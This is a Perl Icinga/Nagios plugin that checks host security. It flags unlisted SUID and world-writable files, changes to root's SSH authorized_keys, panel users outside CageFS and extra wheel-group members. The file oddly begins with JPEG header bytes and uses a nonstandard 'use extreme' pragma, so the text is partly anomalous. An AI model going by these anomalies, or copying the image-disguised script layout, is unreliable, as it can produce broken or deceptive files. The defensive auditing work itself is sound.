����JFIF��x�x����'
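#!/usr/bin/env perl
#
# Icinga/Nagios plugin: host security baseline check.
#
# Reports, using the plugin exit codes 0 OK / 1 WARNING / 2 CRITICAL / 3 UNKNOWN:
#   - world-writable and SUID files that are not in the per-type whitelist,
#   - a changed (-md5) or unexpectedly sized (-c) /root/.ssh/authorized_keys,
#   - on "-t shared" hosts, active panel users that are not inside CageFS,
#   - members of the wheel group that were not declared with -u.
#
# The find(1) walks cover the whole filesystem and /root/.ssh is read, so the
# plugin is expected to run as root.
use extreme;
use strict;
use warnings;
use feature 'say';
use Getopt::Long;
use Digest::MD5 qw(md5_hex);
use JSON::XS;
use File::Slurp qw(read_file write_file);

# Most severe plugin exit code seen so far; only ever raised, see raise_exit().
my $exitcode = 0;

my ( $opt_u, $opt_d, $opt_md5, $opt_e, $opt_c, $opt_t );
help() if !@ARGV;

GetOptions(
    "help|h" => \&help,
    "u=s"    => \$opt_u,
    "d=s"    => \$opt_d,
    "md5=s"  => \$opt_md5,
    "e=s"    => \$opt_e,
    "c=s"    => \$opt_c,
    "t=s"    => \$opt_t,
) or help();    # an unknown option gives usage + UNKNOWN, not a partial run

help() unless $opt_u && $opt_md5 && $opt_c;

# md5_hex() returns lowercase hex, so normalise the baseline before comparing;
# a value that is not a 32-digit hex string can never match and is an error.
$opt_md5 = lc $opt_md5;
if ( $opt_md5 !~ m{\A [0-9a-f]{32} \z}x ) {
    say "UNKNOWN: -md5 must be a 32 character hex digest";
    exit 3;
}
if ( $opt_c !~ m{\A \d+ \z}x ) {
    say "UNKNOWN: -c must be a non-negative integer";
    exit 3;
}

# Built-in whitelists. They only seed the on-disk whitelist files the first
# time execute_find() runs for a type; after that the files are authoritative.
my @suid = (
    '/usr/lib64/nagios/plugins/check_ide_smart',
    '/usr/lib64/nagios/plugins/check_icmp',
    '/usr/lib64/nagios/plugins/check_fping',
    '/usr/lib64/nagios/plugins/check_dhcp',
    '/usr/bin/quota',
    '/usr/bin/gpasswd',
    '/usr/bin/su',
    '/usr/bin/crontab',
    '/usr/bin/passwd',
    '/usr/bin/sudo',
    '/usr/bin/mount',
    '/usr/bin/pkexec',
    '/usr/bin/umount',
    '/usr/bin/newgrp',
    '/usr/bin/chage',
    '/usr/lib/polkit-1/polkit-agent-helper-1',
    '/usr/sbin/unix_chkpwd',
    '/usr/sbin/usernetctl',
    '/usr/sbin/pam_timestamp_check',
    '/usr/libexec/dbus-1/dbus-daemon-launch-helper',
    '/usr/share/python-cllib/userdomains',
    '/usr/sbin/userhelper',
    '/usr/bin/chsh',
    '/usr/bin/chfn',
    '/usr/bin/at',
    '/usr/bin/staprun',
    '/usr/sbin/mount.nfs',
);
my @world;

if ( $opt_t && $opt_t eq 'shared' ) {
    check_cagefs();
    push @world,
        '/etc/cxs/cxscgi.queue',
        '/var/lib/net-snmp/mib_indexes/0',
        '/var/lib/patchman/tmp';
    push @suid,
        '/usr/sbin/exim',
        '/usr/sbin/suexec',
        '/usr/bin/cagefs_enter.proxied',
        '/usr/lib64/mysql/plugin/auth_pam_tool_dir/auth_pam_tool';
}
elsif ( $opt_t && $opt_t eq 'tools' ) {
    push @suid,
        '/usr/bin/fusermount',
        '/usr/sbin/grub2-set-bootflag',
        '/usr/libexec/qemu-bridge-helper',
        '/usr/libexec/sssd/ldap_child',
        '/usr/libexec/sssd/proxy_child',
        '/usr/libexec/sssd/selinux_child',
        '/usr/libexec/sssd/krb5_child';
    push @world, '/var/cache/coolkey', '/var/.vz_swap';
}
elsif ($opt_t) {
    # help() documents exactly two values; a typo must not silently run
    # with the bare whitelist.
    say "UNKNOWN: unsupported -t value '$opt_t' (expected shared or tools)";
    exit 3;
}

my %whitelist = ( world => \@world, suid => \@suid );

# Build the find(1) prefix once; every -d path is pruned from the walk.
my $prune = '';
for my $dir ( split_list($opt_d) ) {
    chomp $dir;
    # Only absolute paths made of [A-Za-z0-9*_-] components are accepted.
    # This text is interpolated into a shell command in execute_find(), so
    # the character class is the guard against command injection.
    next if $dir !~ m{\A (?: /[a-zA-Z0-9*_-]+ )+ \z}x;
    $prune .= '! \( -path "' . $dir . '*" -prune \) ';
}
my $find_base = 'find / \( -type f -o -type d \) ' . $prune;

# -perm /o+w: world-writable files and directories (WARNING).
my @world_files = execute_find( $find_base . '-perm /o+w 2>/dev/null', 'world' );
if (@world_files) {
    print_match( 'World readable/writable files found:', @world_files );
    raise_exit(1);
}

# -perm /4000: SUID files (WARNING).
my @suid_files = execute_find( $find_base . '-perm /4000 2>/dev/null', 'suid' );
if (@suid_files) {
    print_match( 'Files with SUID bit found:', @suid_files );
    raise_exit(1);
}

# Compare root's authorized_keys with the baseline passed on the command line:
# the line count (-c) and the MD5 over the chomped, sorted lines (-md5). The
# lines are chomped BEFORE sorting so the digest matches the recipe printed by
# help(); sorting first would order lines containing control characters
# differently. MD5 is acceptable here because the baseline is a known-good
# snapshot and the check only asks "did anything change".
my $ssh_file = '/root/.ssh/authorized_keys';
my @keys;
if ( open my $fh, '<', $ssh_file ) {
    chomp( my @lines = <$fh> );
    close $fh;
    @keys = sort @lines;
}
else {
    # A missing or unreadable file is itself a finding, not a clean result.
    raise_exit(2);
    say '*******';
    say "Cannot read $ssh_file: $!";
}
if ( scalar @keys != $opt_c ) {
    raise_exit(2);
    say '*******';
    say 'The amount of keys in ' . $ssh_file . ' does not match the amount of users passed!';
    say 'Check the file for possible unwanted or malicious keys.';
}
if ( md5_hex(@keys) ne $opt_md5 ) {
    raise_exit(2);
    say '*******';
    say 'URGENT: The md5 hash for ssh keys file does not match!';
}

# Every wheel member must have been declared with -u. getgrnam() returns the
# member list as a space-separated string in element 3.
my %expected_wheel = map { $_ => 1 } split_list($opt_u);
my $wheel_members  = ( getgrnam('wheel') )[3] // '';
my @incidents_wheel = grep { !$expected_wheel{$_} } split /\s+/, $wheel_members;
if (@incidents_wheel) {
    raise_exit(2);
    print_match( 'Found extra users in wheel group:', @incidents_wheel );
}

exit $exitcode;

# subs

# Print usage and exit UNKNOWN (3).
sub help {
    print "Usage : $0 -u user1,user2,user3 -d dir1,dir2,dir3\n";
    print "Options :\n";
    print " -u: List of usernames to search in wheel group\n";
    print " -d: List of directories to exclude from find string\n";
    print " -md5: md5sum for ssh key file, here is an example how to calculate it:\n";
    print ' perl -e \'use Digest::MD5 qw(md5_hex); print md5_hex(sort map { chomp; $_ } <>)\' /root/.ssh/authorized_keys' . "\n";
    print " -e: List of usernames to exclude from CageFS checks\n";
    print " -c: Amount of keys that are expected to reside in authorized_keys file\n";
    print " -t: server type to generate additional whitelist exceptions. Current available values: shared, tools.";
    print "\nExample of usage : $0 -u admin,dev -d /proc,/usr/lib64 -md5 2a53da1a6fbfc0bafdd96b0a2ea29515 -e username1,username2\n";
    exit 3;
}

# Raise the pending plugin exit code to $level, never lower it.
sub raise_exit {
    my ($level) = @_;
    $exitcode = $level if $level > $exitcode;
    return;
}

# Split a comma-separated option value; undefined or empty values give ().
sub split_list {
    my ($value) = @_;
    return () if !defined $value || !length $value;
    return split /,/, $value;
}

# Print one finding block: a separator, a headline and one item per line.
sub print_match {
    my ( $message, @info ) = @_;
    say '*******';
    say $message;
    say join( "\n", @info );
    return;
}

# On shared hosts every active panel user must live inside CageFS. Users
# listed with -e are exempt. Raises CRITICAL for anyone found outside.
sub check_cagefs {
    my @cagefs = `/sbin/cagefsctl --list-enabled`;
    shift @cagefs;    # the first output line is a header, not a user
    chomp @cagefs;
    my %allowed = map { $_ => 1 } @cagefs, split_list($opt_e);

    my @incidents = grep { !$allowed{$_} }
        cpanel_users(), ispmanager_users(), directadmin_users();
    if (@incidents) {
        raise_exit(2);
        print_match( 'Found users with disabled CageFS:', @incidents );
    }
    return;
}

# Active (non-suspended) cPanel users, or () when cPanel is not installed.
sub cpanel_users {
    return () if !-d '/var/cpanel/users';
    my @users;
    for my $path ( glob '/var/cpanel/users/*' ) {
        my $user = ( split '/', $path )[-1];
        next if -f "/var/cpanel/suspended/$user";
        push @users, $user;
    }
    return @users;
}

# Active ISPmanager users, or () when ISPmanager is not installed. mgrctl's
# JSON puts element text under the '$' key; only users with active == 'on'
# are returned.
sub ispmanager_users {
    my $mgrctl = '/usr/local/mgr5/sbin/mgrctl';
    return () if !-f $mgrctl;
    my $raw   = `$mgrctl -o json -m ispmgr user`;
    my $elems = decode_json($raw)->{doc}{elem} // [];
    return map { $_->{name}{'$'} }
        grep { ( $_->{active}{'$'} // '' ) eq 'on' } @{$elems};
}

# Active DirectAdmin users, or () when DirectAdmin is not installed. A user
# whose user.conf contains a "suspended=yes" line is skipped.
sub directadmin_users {
    return () if !-d '/usr/local/directadmin';
    my $prefix = '/usr/local/directadmin/data/users';
    my @users;
    for my $path ( glob "$prefix/*" ) {
        my $user = ( split '/', $path )[-1];
        my $conf = "$prefix/$user/user.conf";
        next if !-f $conf;
        next if grep { /^suspended=yes/ } read_file($conf);
        push @users, $user;
    }
    return @users;
}

# Run a prepared find(1) command line and drop every path listed in the
# whitelist file for $type ('world' or 'suid'). Returns the remaining paths,
# or () when find printed nothing.
sub execute_find {
    my ( $cmd, $type ) = @_;
    # $cmd is fixed text plus -d paths that passed the character-class check
    # above, so nothing user controlled reaches the shell unvalidated.
    my @found = `$cmd`;
    chomp @found;
    return if !@found;

    my $wlfile = "/etc/icinga2/plinc/security_${type}_wl";
    write_file( $wlfile, join( "\n", @{ $whitelist{$type} } ) ) if !-f $wlfile;

    # Whatever is in the whitelist is silently accepted as a SUID or
    # world-writable path, so the file must not be writable by group or
    # others; report that instead of trusting its contents.
    my $mode = ( stat $wlfile )[2];
    if ( defined $mode && ( $mode & 022 ) ) {
        raise_exit(2);
        print_match( 'Whitelist file is writable by group or others:', $wlfile );
    }

    # Entries are compared as exact paths rather than interpolated into a
    # regex, so a "." or ".*" in the file cannot widen an exception.
    my %allowed = map { chomp( my $path = $_ ); $path => 1 } read_file($wlfile);
    return grep { !$allowed{$_} } @found;
}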